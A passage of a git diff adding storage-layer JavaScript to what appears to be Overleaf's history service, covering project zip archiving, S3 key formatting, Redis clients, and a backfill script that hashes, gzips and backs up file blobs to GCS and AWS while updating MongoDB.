+convertKey('gcs.unlockBeforeDelete', s => s === 'true') +convertKey('gcs.unsignedUrls', s => s === 'true') +convertKey('gcs.signedUrlExpiryInMs', s => parseInt(s, 10)) +convertKey('gcs.deleteConcurrency', s => parseInt(s, 10)) +convertKey('gcs.retryOptions.maxRetries', s => parseInt(s, 10)) +convertKey('fallback.buckets', s => JSON.parse(s || '{}')) + +persistorConfig.Metrics = metrics + +module.exports = objectPersistor(persistorConfig) diff --git a/services/history-v1/storage/lib/project_archive.js b/services/history-v1/storage/lib/project_archive.js new file mode 100644 index 0000000..8a8e93f --- /dev/null +++ b/services/history-v1/storage/lib/project_archive.js @@ -0,0 +1,140 @@ +// @ts-check +'use strict' + +/** + * @import { Snapshot } from 'overleaf-editor-core' + * @import { BlobStore } from '../../storage/lib/blob_store/index' + */ + +const Archive = require('archiver') +const BPromise = require('bluebird') +const fs = require('node:fs') +const { pipeline } = require('node:stream') + +const core = require('overleaf-editor-core') + +const Snapshot = core.Snapshot +const OError = require('@overleaf/o-error') + +const assert = require('./assert') + +// The maximum safe concurrency appears to be 1. +// https://github.com/overleaf/issues/issues/1909 +const FETCH_CONCURRENCY = 1 // number of files to fetch at once +const DEFAULT_ZIP_TIMEOUT = 25000 // ms + +class DownloadError extends OError { + constructor(hash) { + super(`ProjectArchive: blob download failed: ${hash}`, { hash }) + } +} + +class ArchiveTimeout extends OError { + constructor() { + super('ProjectArchive timed out') + } +} + +class MissingfileError extends OError { + constructor() { + super('ProjectArchive: attempting to look up a file that does not exist') + } +} + +class ProjectArchive { + static ArchiveTimeout = ArchiveTimeout + static MissingfileError = MissingfileError + static DownloadError = DownloadError + + /** + * @constructor + * @param {Snapshot} snapshot + * @param {number} [timeout] in ms + * @classdesc + * Writes the project snapshot to a zip file. + */ + constructor(snapshot, timeout) { + assert.instance(snapshot, Snapshot) + this.snapshot = snapshot + this.timeout = timeout || DEFAULT_ZIP_TIMEOUT + } + + /** + * Write zip archive to the given file path. + * + * @param {BlobStore} blobStore + * @param {string} zipFilePath + */ + writeZip(blobStore, zipFilePath) { + const snapshot = this.snapshot + const timeout = this.timeout + + const startTime = process.hrtime() + const archive = new Archive('zip') + + // Convert elapsed seconds and nanoseconds to milliseconds. + function findElapsedMilliseconds() { + const elapsed = process.hrtime(startTime) + return elapsed[0] * 1e3 + elapsed[1] * 1e-6 + } + + function addFileToArchive(pathname) { + if (findElapsedMilliseconds() > timeout) { + throw new ProjectArchive.ArchiveTimeout() + } + + const file = snapshot.getFile(pathname) + if (!file) { + throw new ProjectArchive.MissingfileError() + } + return file.load('eager', blobStore).then(function () { + const content = file.getContent({ filterTrackedDeletes: true }) + if (content === null) { + return streamFileToArchive(pathname, file).catch(function (err) { + throw new ProjectArchive.DownloadError(file.getHash()).withCause( + err + ) + }) + } else { + archive.append(content, { name: pathname }) + } + }) + } + + function streamFileToArchive(pathname, file) { + return new BPromise(function (resolve, reject) { + blobStore + .getStream(file.getHash()) + .then(stream => { + stream.on('error', reject) + stream.on('end', resolve) + archive.append(stream, { name: pathname }) + }) + .catch(reject) + }) + } + + const addFilesToArchiveAndFinalize = BPromise.map( + snapshot.getFilePathnames(), + addFileToArchive, + { concurrency: FETCH_CONCURRENCY } + ).then(function () { + archive.finalize() + }) + + const streamArchiveToFile = new BPromise(function (resolve, reject) { + const stream = fs.createWriteStream(zipFilePath) + pipeline(archive, stream, function (err) { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + + return BPromise.join(streamArchiveToFile, addFilesToArchiveAndFinalize) + } +} + +module.exports = ProjectArchive diff --git a/services/history-v1/storage/lib/project_key.js b/services/history-v1/storage/lib/project_key.js new file mode 100644 index 0000000..03fb2a5 --- /dev/null +++ b/services/history-v1/storage/lib/project_key.js @@ -0,0 +1,24 @@ +// Keep in sync with services/web/app/src/Features/History/project_key.js +const _ = require('lodash') +const path = require('node:path') + +// +// The advice in http://docs.aws.amazon.com/AmazonS3/latest/dev/ +// request-rate-perf-considerations.html is to avoid sequential key prefixes, +// so we reverse the project ID part of the key as they suggest. +// +function format(projectId) { + const prefix = naiveReverse(pad(projectId)) + return path.join(prefix.slice(0, 3), prefix.slice(3, 6), prefix.slice(6)) +} + +function pad(number) { + return _.padStart(number, 9, '0') +} + +function naiveReverse(string) { + return string.split('').reverse().join('') +} + +exports.format = format +exports.pad = pad diff --git a/services/history-v1/storage/lib/redis.js b/services/history-v1/storage/lib/redis.js new file mode 100644 index 0000000..9b00cc0 --- /dev/null +++ b/services/history-v1/storage/lib/redis.js @@ -0,0 +1,19 @@ +const config = require('config') +const redis = require('@overleaf/redis-wrapper') + +const historyRedisOptions = config.get('redis.history') +const rclientHistory = redis.createClient(historyRedisOptions) + +const lockRedisOptions = config.get('redis.history') +const rclientLock = redis.createClient(lockRedisOptions) + +async function disconnect() { + await Promise.all([rclientHistory.disconnect(), rclientLock.disconnect()]) +} + +module.exports = { + rclientHistory, + rclientLock, + redis, + disconnect, +} diff --git a/services/history-v1/storage/lib/streams.js b/services/history-v1/storage/lib/streams.js new file mode 100644 index 0000000..e60e5aa --- /dev/null +++ b/services/history-v1/storage/lib/streams.js @@ -0,0 +1,40 @@ +// @ts-check +/** + * Promises are promises and streams are streams, and ne'er the twain shall + * meet. + * @module + */ +'use strict' + +const Stream = require('node:stream') +const zlib = require('node:zlib') +const { WritableBuffer } = require('@overleaf/stream-utils') + +/** + * Create a promise for the result of reading a stream to a buffer. + * + * @param {Stream.Readable} readStream + * @return {Promise<Buffer>} + */ +async function readStreamToBuffer(readStream) { + const bufferStream = new WritableBuffer() + await Stream.promises.pipeline(readStream, bufferStream) + return bufferStream.contents() +} + +exports.readStreamToBuffer = readStreamToBuffer + +/** + * Create a promise for the result of un-gzipping a stream to a buffer. + * + * @param {NodeJS.ReadableStream} readStream + * @return {Promise<Buffer>} + */ +async function gunzipStreamToBuffer(readStream) { + const gunzip = zlib.createGunzip() + const bufferStream = new WritableBuffer() + await Stream.promises.pipeline(readStream, gunzip, bufferStream) + return bufferStream.contents() +} + +exports.gunzipStreamToBuffer = gunzipStreamToBuffer diff --git a/services/history-v1/storage/lib/temp.js b/services/history-v1/storage/lib/temp.js new file mode 100644 index 0000000..1aab3c1 --- /dev/null +++ b/services/history-v1/storage/lib/temp.js @@ -0,0 +1,25 @@ +/* + * Taken from renderer/app/helpers/temp.js with minor cosmetic changes. + * Promisify the temp package. The temp package provides a 'track' feature + * that automatically cleans up temp files at process exit, but that is not + * very useful. They also provide a method to trigger cleanup, but that is not + * safe for concurrent use. So, we use a disposer to unlink the file. + */ + +const BPromise = require('bluebird') +const fs = BPromise.promisifyAll(require('node:fs')) +const temp = BPromise.promisifyAll(require('temp')) + +exports.open = function (affixes) { + return temp.openAsync(affixes).disposer(function (fileInfo) { + fs.closeAsync(fileInfo.fd) + .then(() => { + return fs.unlinkAsync(fileInfo.path) + }) + .catch(function (err) { + if (err.code !== 'ENOENT') { + throw err + } + }) + }) +} diff --git a/services/history-v1/storage/lib/zip_store.js b/services/history-v1/storage/lib/zip_store.js new file mode 100644 index 0000000..0741829 --- /dev/null +++ b/services/history-v1/storage/lib/zip_store.js @@ -0,0 +1,134 @@ +'use strict' + +const BPromise = require('bluebird') +const config = require('config') +const fs = require('node:fs') +const path = require('node:path') + +const OError = require('@overleaf/o-error') +const objectPersistor = require('@overleaf/object-persistor') + +const assert = require('./assert') +const { BlobStore } = require('./blob_store') +const persistor = require('./persistor') +const ProjectArchive = require('./project_archive') +const projectKey = require('./project_key') +const temp = require('./temp') + +const BUCKET = config.get('zipStore.bucket') + +function getZipKey(projectId, version) { + return path.join( + projectKey.format(projectId), + version.toString(), + 'project.zip' + ) +} + +/** + * Store a zip of a given version of a project in bucket. + * + * @class + */ +class ZipStore { + /** + * Generate signed link to access the zip file. + * + * @param {number | string} projectId + * @param {number} version + * @return {string} + */ + async getSignedUrl(projectId, version) { + assert.projectId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + + const key = getZipKey(projectId, version) + return await persistor.getRedirectUrl(BUCKET, key) + } + + /** + * Generate a zip of the given snapshot. + * + * @param {number | string} projectId + * @param {number} version + * @param {Snapshot} snapshot + */ + async storeZip(projectId, version, snapshot) { + assert.projectId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + assert.object(snapshot, 'bad snapshot') + + const zipKey = getZipKey(projectId, version) + + if (await isZipPresent()) return + + await BPromise.using(temp.open('zip'), async tempFileInfo => { + await zipSnapshot(tempFileInfo.path, snapshot) + await uploadZip(tempFileInfo.path) + }) + + // If the file is already there, we don't need to build the zip again. If we + // just HEAD the file, there's a race condition, because the zip files + // automatically expire. So, we try to copy the file from itself to itself, + // and if it fails, we know the file didn't exist. If it succeeds, this has + // the effect of re-extending its lifetime. + async function isZipPresent() { + try { + await persistor.copyObject(BUCKET, zipKey, zipKey) + return true + } catch (error) { + if (!(error instanceof objectPersistor.Errors.NotFoundError)) { + console.error( + 'storeZip: isZipPresent: unexpected error (except in dev): %s', + error + ) + } + return false + } + } + + async function zipSnapshot(tempPathname, snapshot) { + const blobStore = new BlobStore(projectId) + const zipTimeoutMs = parseInt(config.get('zipStore.zipTimeoutMs'), 10) + const archive = new ProjectArchive(snapshot, zipTimeoutMs) + try { + await archive.writeZip(blobStore, tempPathname) + } catch (err) { + throw new ZipStore.CreationError(projectId, version).withCause(err) + } + } + + async function uploadZip(tempPathname, snapshot) { + const stream = fs.createReadStream(tempPathname) + try { + await persistor.sendStream(BUCKET, zipKey, stream, { + contentType: 'application/zip', + }) + } catch (err) { + throw new ZipStore.UploadError(projectId, version).withCause(err) + } + } + } +} + +class CreationError extends OError { + constructor(projectId, version) { + super(`Zip creation failed for ${projectId} version ${version}`, { + projectId, + version, + }) + } +} +ZipStore.CreationError = CreationError + +class UploadError extends OError { + constructor(projectId, version) { + super(`Zip upload failed for ${projectId} version ${version}`, { + projectId, + version, + }) + } +} +ZipStore.UploadError = UploadError + +module.exports = new ZipStore() diff --git a/services/history-v1/storage/scripts/back_fill_file_hash.mjs b/services/history-v1/storage/scripts/back_fill_file_hash.mjs new file mode 100644 index 0000000..96dfd79 --- /dev/null +++ b/services/history-v1/storage/scripts/back_fill_file_hash.mjs @@ -0,0 +1,1476 @@ +// @ts-check +import Crypto from 'node:crypto' +import Events from 'node:events' +import fs from 'node:fs' +import Path from 'node:path' +import { performance } from 'node:perf_hooks' +import Stream from 'node:stream' +import zLib from 'node:zlib' +import { setTimeout } from 'node:timers/promises' +import { Binary, ObjectId } from 'mongodb' +import pLimit from 'p-limit' +import logger from '@overleaf/logger' +import { + batchedUpdate, + objectIdFromInput, + renderObjectId, + READ_PREFERENCE_SECONDARY, +} from '@overleaf/mongo-utils/batchedUpdate.js' +import OError from '@overleaf/o-error' +import { + AlreadyWrittenError, + NoKEKMatchedError, + NotFoundError, +} from '@overleaf/object-persistor/src/Errors.js' +import { backupPersistor, projectBlobsBucket } from '../lib/backupPersistor.mjs' +import { + BlobStore, + GLOBAL_BLOBS, + loadGlobalBlobs, + getProjectBlobsBatch, + getStringLengthOfFile, + makeBlobForFile, + makeProjectKey, +} from '../lib/blob_store/index.js' +import { backedUpBlobs as backedUpBlobsCollection, db } from '../lib/mongodb.js' +import filestorePersistor from '../lib/persistor.js' +import commandLineArgs from 'command-line-args' +import readline from 'node:readline' + +// Silence warning. +Events.setMaxListeners(20) + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +/** + * @typedef {import("overleaf-editor-core").Blob} Blob + * @typedef {import("perf_hooks").EventLoopUtilization} EventLoopUtilization + * @typedef {import("mongodb").Collection} Collection + * @typedef {import("mongodb").Collection<Project>} ProjectsCollection + * @typedef {import("mongodb").Collection<{project:Project}>} DeletedProjectsCollection + * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor + */ + +/** + * @typedef {Object} FileRef + * @property {ObjectId} _id + * @property {string} hash + */ + +/** + * @typedef {Object} Folder + * @property {Array<Folder>} folders + * @property {Array<FileRef>} fileRefs + */ + +/** + * @typedef {Object} DeletedFileRef + * @property {ObjectId} _id + * @property {ObjectId} projectId + * @property {string} hash + */ + +/** + * @typedef {Object} Project + * @property {ObjectId} _id + * @property {Array<Folder>} rootFolder + * @property {{history: {id: (number|string)}}} overleaf + */ + +/** + * @typedef {Object} QueueEntry + * @property {ProjectContext} ctx + * @property {string} cacheKey + * @property {string} [fileId] + * @property {string} path + * @property {string} [hash] + * @property {Blob} [blob] + */ + +/** + * @return {{PROJECT_IDS_FROM: string, PROCESS_HASHED_FILES: boolean, PROCESS_DELETED_FILES: boolean, LOGGING_IDENTIFIER: string, BATCH_RANGE_START: string, PROCESS_BLOBS: boolean, BATCH_RANGE_END: string, PROCESS_NON_DELETED_PROJECTS: boolean, PROCESS_DELETED_PROJECTS: boolean, COLLECT_BACKED_UP_BLOBS: boolean}} + */ +function parseArgs() { + const PUBLIC_LAUNCH_DATE = new Date('2012-01-01T00:00:00Z') + const args = commandLineArgs([ + { name: 'processNonDeletedProjects', type: String, defaultValue: 'false' }, + { name: 'processDeletedProjects', type: String, defaultValue: 'false' }, + { name: 'processDeletedFiles', type: String, defaultValue: 'false' }, + { name: 'processHashedFiles', type: String, defaultValue: 'false' }, + { name: 'processBlobs', type: String, defaultValue: 'true' }, + { name: 'projectIdsFrom', type: String, defaultValue: '' }, + { name: 'collectBackedUpBlobs', type: String, defaultValue: 'true' }, + { + name: 'BATCH_RANGE_START', + type: String, + defaultValue: PUBLIC_LAUNCH_DATE.toISOString(), + }, + { + name: 'BATCH_RANGE_END', + type: String, + defaultValue: new Date().toISOString(), + }, + { name: 'LOGGING_IDENTIFIER', type: String, defaultValue: '' }, + ]) + /** + * commandLineArgs cannot handle --foo=false, so go the long way + * @param {string} name + * @return {boolean} + */ + function boolVal(name) { + const v = args[name] + if (['true', 'false'].includes(v)) return v === 'true' + throw new Error(`expected "true" or "false" for boolean option ${name}`) + } + const BATCH_RANGE_START = objectIdFromInput( + args['BATCH_RANGE_START'] + ).toString() + const BATCH_RANGE_END = objectIdFromInput(args['BATCH_RANGE_END']).toString() + return { + PROCESS_NON_DELETED_PROJECTS: boolVal('processNonDeletedProjects'), + PROCESS_DELETED_PROJECTS: boolVal('processDeletedProjects'), + PROCESS_BLOBS: boolVal('processBlobs'), + PROCESS_DELETED_FILES: boolVal('processDeletedFiles'), + PROCESS_HASHED_FILES: boolVal('processHashedFiles'), + COLLECT_BACKED_UP_BLOBS: boolVal('collectBackedUpBlobs'), + BATCH_RANGE_START, + BATCH_RANGE_END, + LOGGING_IDENTIFIER: args['LOGGING_IDENTIFIER'] || BATCH_RANGE_START, + PROJECT_IDS_FROM: args['projectIdsFrom'], + } +} + +const { + PROCESS_NON_DELETED_PROJECTS, + PROCESS_DELETED_PROJECTS, + PROCESS_BLOBS, + PROCESS_DELETED_FILES, + PROCESS_HASHED_FILES, + COLLECT_BACKED_UP_BLOBS, + BATCH_RANGE_START, + BATCH_RANGE_END, + LOGGING_IDENTIFIER, + PROJECT_IDS_FROM, +} = parseArgs() + +// We need to handle the start and end differently as ids of deleted projects are created at time of deletion. +if (process.env.BATCH_RANGE_START || process.env.BATCH_RANGE_END) { + throw new Error('use --BATCH_RANGE_START and --BATCH_RANGE_END') +} + +// Concurrency for downloading from GCS and updating hashes in mongo +const CONCURRENCY = parseInt(process.env.CONCURRENCY || '100', 10) +const CONCURRENT_BATCHES = parseInt(process.env.CONCURRENT_BATCHES || '2', 10) +// Retries for processing a given file +const RETRIES = parseInt(process.env.RETRIES || '10', 10) +const RETRY_DELAY_MS = parseInt(process.env.RETRY_DELAY_MS || '100', 10) + +const USER_FILES_BUCKET_NAME = process.env.USER_FILES_BUCKET_NAME || '' +if (!USER_FILES_BUCKET_NAME) { + throw new Error('env var USER_FILES_BUCKET_NAME is missing') +} +const RETRY_FILESTORE_404 = process.env.RETRY_FILESTORE_404 === 'true' +const BUFFER_DIR = fs.mkdtempSync( + process.env.BUFFER_DIR_PREFIX || '/tmp/back_fill_file_hash-' +) +// https://nodejs.org/api/stream.html#streamgetdefaulthighwatermarkobjectmode +const STREAM_HIGH_WATER_MARK = parseInt( + process.env.STREAM_HIGH_WATER_MARK || (64 * 1024).toString(), + 10 +) +const LOGGING_INTERVAL = parseInt(process.env.LOGGING_INTERVAL || '60000', 10) +const SLEEP_BEFORE_EXIT = parseInt(process.env.SLEEP_BEFORE_EXIT || '1000', 10) + +const projectsCollection = db.collection('projects') +/** @type {ProjectsCollection} */ +const typedProjectsCollection = db.collection('projects') +const deletedProjectsCollection = db.collection('deletedProjects') +/** @type {DeletedProjectsCollection} */ +const typedDeletedProjectsCollection = db.collection('deletedProjects') +const deletedFilesCollection = db.collection('deletedFiles') + +const concurrencyLimit = pLimit(CONCURRENCY) + +/** + * @template T + * @template V + * @param {Array<T>} array + * @param {(arg: T) => Promise<V>} fn + * @return {Promise<Array<Awaited<V>>>} + */ +async function processConcurrently(array, fn) { + return await Promise.all(array.map(x => concurrencyLimit(() => fn(x)))) +} + +const STATS = { + projects: 0, + blobs: 0, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 0, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + fileTreeUpdated: 0, + badFileTrees: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + mongoUpdates: 0, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 0, + readFromGCSIngress: 0, + writeToAWSCount: 0, + writeToAWSEgress: 0, + writeToGCSCount: 0, + writeToGCSEgress: 0, +} + +const processStart = performance.now() +let lastLogTS = processStart +let lastLog = Object.assign({}, STATS) +let lastEventLoopStats = performance.eventLoopUtilization() + +/** + * @param {number} v + * @param {number} ms + */ +function toMiBPerSecond(v, ms) { + const ONE_MiB = 1024 * 1024 + return v / ONE_MiB / (ms / 1000) +} + +/** + * @param {any} stats + * @param {number} ms + * @return {{writeToAWSThroughputMiBPerSecond: number, readFromGCSThroughputMiBPerSecond: number}} + */ +function bandwidthStats(stats, ms) { + return { + readFromGCSThroughputMiBPerSecond: toMiBPerSecond( + stats.readFromGCSIngress, + ms + ), + writeToAWSThroughputMiBPerSecond: toMiBPerSecond( + stats.writeToAWSEgress, + ms + ), + } +} + +/** + * @param {EventLoopUtilization} nextEventLoopStats + * @param {number} now + * @return {Object} + */ +function computeDiff(nextEventLoopStats, now) { + const ms = now - lastLogTS + lastLogTS = now + const diff = { + eventLoop: performance.eventLoopUtilization( + nextEventLoopStats, + lastEventLoopStats + ), + } + for (const [name, v] of Object.entries(STATS)) { + diff[name] = v - lastLog[name] + } + return Object.assign(diff, bandwidthStats(diff, ms)) +} + +/** + * @param {boolean} isLast + */ +function printStats(isLast = false) { + const now = performance.now() + const nextEventLoopStats = performance.eventLoopUtilization() + const logLine = JSON.stringify({ + time: new Date(), + LOGGING_IDENTIFIER, + ...STATS, + ...bandwidthStats(STATS, now - processStart), + eventLoop: nextEventLoopStats, + diff: computeDiff(nextEventLoopStats, now), + deferredBatches: Array.from(deferredBatches.keys()), + }) + if (isLast) { + console.warn(logLine) + } else { + console.log(logLine) + } + lastEventLoopStats = nextEventLoopStats + lastLog = Object.assign({}, STATS) +} + +setInterval(printStats, LOGGING_INTERVAL) + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +/** + * @param {QueueEntry} entry + * @return {Promise<string>} + */ +async function processFileWithCleanup(entry) { + const { + ctx: { projectId }, + cacheKey, + } = entry + const filePath = Path.join(BUFFER_DIR, projectId.toString() + cacheKey) + try { + return await processFile(entry, filePath) + } finally { + await Promise.all([ + fs.promises.rm(filePath, { force: true }), + fs.promises.rm(filePath + GZ_SUFFIX, { force: true }), + ]) + } +} + +/** + * @param {QueueEntry} entry + * @param {string} filePath + * @return {Promise<string>} + */ +async function processFile(entry, filePath) { + for (let attempt = 0; attempt < RETRIES; attempt++) { + try { + return await processFileOnce(entry, filePath) + } catch (err) { + if (gracefulShutdownInitiated) throw err + if (err instanceof NotFoundError) { + const { bucketName } = OError.getFullInfo(err) + if (bucketName === USER_FILES_BUCKET_NAME && !RETRY_FILESTORE_404) { + throw err // disable retries for not found in filestore bucket case + } + } + if (err instanceof NoKEKMatchedError) { + throw err // disable retries when upload to S3 will fail again + } + STATS.filesRetries++ + const { + ctx: { projectId }, + fileId, + hash, + path, + } = entry + logger.warn( + { err, projectId, fileId, hash, path, attempt }, + 'failed to process file, trying again' + ) + const jitter = Math.random() * RETRY_DELAY_MS + await setTimeout(RETRY_DELAY_MS + jitter) + } + } + return await processFileOnce(entry, filePath) +} + +/** + * @param {QueueEntry} entry + * @param {string} filePath + * @return {Promise<string>} + */ +async function processFileOnce(entry, filePath) { + const { + ctx: { projectId, historyId }, + fileId, + } = entry + const blobStore = new BlobStore(historyId) + if (entry.blob) { + const { blob } = entry + const hash = blob.getHash() + if (entry.ctx.hasBackedUpBlob(hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return hash + } + entry.ctx.recordPendingBlob(hash) + STATS.readFromGCSCount++ + const src = await blobStore.getStream(hash) + const dst = fs.createWriteStream(filePath, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + try { + await Stream.promises.pipeline(src, dst) + } finally { + STATS.readFromGCSIngress += dst.bytesWritten + } + await uploadBlobToAWS(entry, blob, filePath) + return hash + } + if (entry.hash && entry.ctx.hasBackedUpBlob(entry.hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + const blob = entry.ctx.getCachedHistoryBlob(entry.hash) + // blob might not exist on re-run with --PROCESS_BLOBS=false + if (blob) STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return entry.hash + } + + STATS.readFromGCSCount++ + const src = await filestorePersistor.getObjectStream( + USER_FILES_BUCKET_NAME, + `${projectId}/${fileId}` + ) + const dst = fs.createWriteStream(filePath, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + try { + await Stream.promises.pipeline(src, dst) + } finally { + STATS.readFromGCSIngress += dst.bytesWritten + } + const blob = await makeBlobForFile(filePath) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), filePath) + ) + const hash = blob.getHash() + if (entry.hash && hash !== entry.hash) { + throw new OError('hash mismatch', { entry, hash }) + } + + if (GLOBAL_BLOBS.has(hash)) { + STATS.globalBlobsCount++ + STATS.globalBlobsEgress += estimateBlobSize(blob) + return hash + } + if (entry.ctx.hasBackedUpBlob(hash)) { + STATS.deduplicatedWriteToAWSLocalCount++ + STATS.deduplicatedWriteToAWSLocalEgress += estimateBlobSize(blob) + return hash + } + entry.ctx.recordPendingBlob(hash) + + try { + await uploadBlobToGCS(blobStore, entry, blob, hash, filePath) + await uploadBlobToAWS(entry, blob, filePath) + } catch (err) { + entry.ctx.recordFailedBlob(hash) + throw err + } + return hash +} + +/** + * @param {BlobStore} blobStore + * @param {QueueEntry} entry + * @param {Blob} blob + * @param {string} hash + * @param {string} filePath + * @return {Promise<void>} + */ +async function uploadBlobToGCS(blobStore, entry, blob, hash, filePath) { + if (entry.ctx.getCachedHistoryBlob(hash)) { + return // fast-path using hint from pre-fetched blobs + } + if (!PROCESS_BLOBS) { + // round trip to postgres/mongo when not pre-fetched + const blob = await blobStore.getBlob(hash) + if (blob) { + entry.ctx.recordHistoryBlob(blob) + return + } + } + // blob missing in history-v1, create in GCS and persist in postgres/mongo + STATS.writeToGCSCount++ + STATS.writeToGCSEgress += blob.getByteLength() + await blobStore.putBlob(filePath, blob) + entry.ctx.recordHistoryBlob(blob) +} + +const GZ_SUFFIX = '.gz' + +/** + * @param {QueueEntry} entry + * @param {Blob} blob + * @param {string} filePath + * @return {Promise<void>} + */ +async function uploadBlobToAWS(entry, blob, filePath) { + const { historyId } = entry.ctx + let backupSource + let contentEncoding + const md5 = Crypto.createHash('md5') + let size + if (blob.getStringLength()) { + const filePathCompressed = filePath + GZ_SUFFIX + backupSource = filePathCompressed + contentEncoding = 'gzip' + size = 0 + await Stream.promises.pipeline( + fs.createReadStream(filePath, { highWaterMark: STREAM_HIGH_WATER_MARK }), + zLib.createGzip(), + async function* (source) { + for await (const chunk of source) { + size += chunk.byteLength + md5.update(chunk) + yield chunk + } + }, + fs.createWriteStream(filePathCompressed, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }) + ) + } else { + backupSource = filePath + size = blob.getByteLength() + await Stream.promises.pipeline( + fs.createReadStream(filePath, { highWaterMark: STREAM_HIGH_WATER_MARK }), + md5 + ) + } + const backendKeyPath = makeProjectKey(historyId, blob.getHash()) + const persistor = await entry.ctx.getCachedPersistor(backendKeyPath) + try { + STATS.writeToAWSCount++ + await persistor.sendStream( + projectBlobsBucket, + backendKeyPath, + fs.createReadStream(backupSource, { + highWaterMark: STREAM_HIGH_WATER_MARK, + }), + { + contentEncoding, + contentType: 'application/octet-stream', + contentLength: size, + sourceMd5: md5.digest('hex'), + ifNoneMatch: '*', // de-duplicate write (we pay for the request, but avoid egress) + } + ) + STATS.writeToAWSEgress += size + } catch (err) { + if (err instanceof AlreadyWrittenError) { + STATS.deduplicatedWriteToAWSRemoteCount++ + STATS.deduplicatedWriteToAWSRemoteEgress += size + } else { + STATS.writeToAWSEgress += size + throw err + } + } + entry.ctx.recordBackedUpBlob(blob.getHash()) +} + +/** + * @param {Array<QueueEntry>} files + * @return {Promise<void>} + */ +async function processFiles(files) { + await processConcurrently( + files, + /** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ + async function (entry) { + if (gracefulShutdownInitiated) return + try { + await entry.ctx.processFile(entry) + } catch (err) { + STATS.filesFailed++ + const { + ctx: { projectId }, + fileId, + hash, + path, + } = entry + logger.error( + { err, projectId, fileId, hash, path }, + 'failed to process file' + ) + } + } + ) +} + +/** @type {Map<string, Promise>} */ +const deferredBatches = new Map() + +async function waitForDeferredQueues() { + // Wait for ALL pending batches to finish, especially wait for their mongo + // writes to finish to avoid extra work when resuming the batch. + const all = await Promise.allSettled(deferredBatches.values()) + // Now that all batches finished, we can throw if needed. + for (const res of all) { + if (res.status === 'rejected') { + throw res.reason + } + } +} + +/** + * @param {Array<Project>} batch + * @param {string} prefix + */ +async function queueNextBatch(batch, prefix = 'rootFolder.0') { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown: aborting batch processing') + } + + // Read ids now, the batch will get trimmed by processBatch shortly. + const start = renderObjectId(batch[0]._id) + const end = renderObjectId(batch[batch.length - 1]._id) + const deferred = processBatch(batch, prefix) + .then(() => { + console.error(`Actually completed batch ending ${end}`) + }) + .catch(err => { + logger.error({ err, start, end }, 'fatal error processing batch') + throw err + }) + .finally(() => { + deferredBatches.delete(end) + }) + deferredBatches.set(end, deferred) + + if (deferredBatches.size >= CONCURRENT_BATCHES) { + // Wait for any of the deferred batches to finish before fetching the next. + // We should never have more than CONCURRENT_BATCHES batches in memory. + await Promise.race(deferredBatches.values()) + } +} + +/** + * @param {Array<Project>} batch + * @param {string} prefix + * @return {Promise<void>} + */ +async function processBatch(batch, prefix = 'rootFolder.0') { + const [deletedFiles, { nBlobs, blobs }, { nBackedUpBlobs, backedUpBlobs }] = + await Promise.all([ + collectDeletedFiles(batch), + collectProjectBlobs(batch), + collectBackedUpBlobs(batch), + ]) + const files = Array.from( + findFileInBatch(batch, prefix, deletedFiles, blobs, backedUpBlobs) + ) + STATS.projects += batch.length + STATS.blobs += nBlobs + STATS.backedUpBlobs += nBackedUpBlobs + + // GC + batch.length = 0 + deletedFiles.clear() + blobs.clear() + backedUpBlobs.clear() + + // The files are currently ordered by project-id. + // Order them by file-id ASC then blobs ASC to + // - process files before blobs + // - avoid head-of-line blocking from many project-files waiting on the generation of the projects DEK (round trip to AWS) + // - bonus: increase chance of de-duplicating write to AWS + files.sort( + /** + * @param {QueueEntry} a + * @param {QueueEntry} b + * @return {number} + */ + function (a, b) { + if (a.fileId && b.fileId) return a.fileId > b.fileId ? 1 : -1 + if (a.hash && b.hash) return a.hash > b.hash ? 1 : -1 + if (a.fileId) return -1 + return 1 + } + ) + await processFiles(files) + await processConcurrently( + files, + /** + * @param {QueueEntry} entry + * @return {Promise<void>} + */ + async function (entry) { + await entry.ctx.flushMongoQueues() + } + ) +} + +/** + * @param {Array<{project: Project}>} batch + * @return {Promise<void>} + */ +async function handleDeletedFileTreeBatch(batch) { + await queueNextBatch( + batch.map(d => d.project), + 'project.rootFolder.0' + ) +} + +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateFileRefInMongo(entry) { + if (entry.path === MONGO_PATH_DELETED_FILE) { + return await tryUpdateDeletedFileRefInMongo(entry) + } else if (entry.path.startsWith('project.')) { + return await tryUpdateFileRefInMongoInDeletedProject(entry) + } + + STATS.mongoUpdates++ + const result = await projectsCollection.updateOne( + { + _id: entry.ctx.projectId, + [`${entry.path}._id`]: new ObjectId(entry.fileId), + }, + { + $set: { [`${entry.path}.hash`]: entry.hash }, + } + ) + return result.matchedCount === 1 +} + +/** + * @param {QueueEntry} entry + * @return {Promise<boolean>} + */ +async function tryUpdateDeletedFileRefInMongo(entry) { + STATS.mongoUpdates++ + const result = await deletedFilesCollection.updateOne( + { + _id: new ObjectId(entry.fileId), + projectId: entry.ctx.projectId, + }, + { $set: { hash: entry.hash } } + ) + return result.matchedCount === 1 +} 